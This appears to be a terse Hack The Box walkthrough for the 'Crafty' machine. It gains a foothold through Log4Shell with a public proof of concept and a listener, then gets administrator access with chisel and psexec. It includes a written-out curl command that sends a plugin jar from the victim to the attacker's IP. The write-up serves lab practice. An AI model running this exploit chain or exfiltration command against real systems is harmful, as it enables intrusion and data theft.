👾Crafty - HTB

https://app.hackthebox.com/machines/Crafty

User

first download minecraft client

https://github.com/MCCTeam/Minecraft-Console-Client

download also log4j exploit

GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.GitHub

Also download jdk1.8.0_20

https://download.oracle.com/otn/java/jdk/8u202-b08/1961070e4c9b4e26a04e7f5a083f551e/jdk-8u202-linux-x64.tar.gz

first lets connect to the minecraft server ,but note that sometimes it will only gives you 1 try to connect then either you need to use game launcher and do it through the chat ,or reset the machine .

first you need to modify the poc.py from /bin/sh to cmd.exe

run a listener on port 1337 as in command

Root

run upload listener

and from victim machine do

curl -i -XPOST -F "files=@C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar" http://ur-IP/upload

use java decompiler jd-gui

found a password

its administrator password ,we can use manyways but my approach was to forward port 445 smb using chisel ,then use psexec from impacket tools to connect as administrator ,you can also use runas.exe

Runas.exe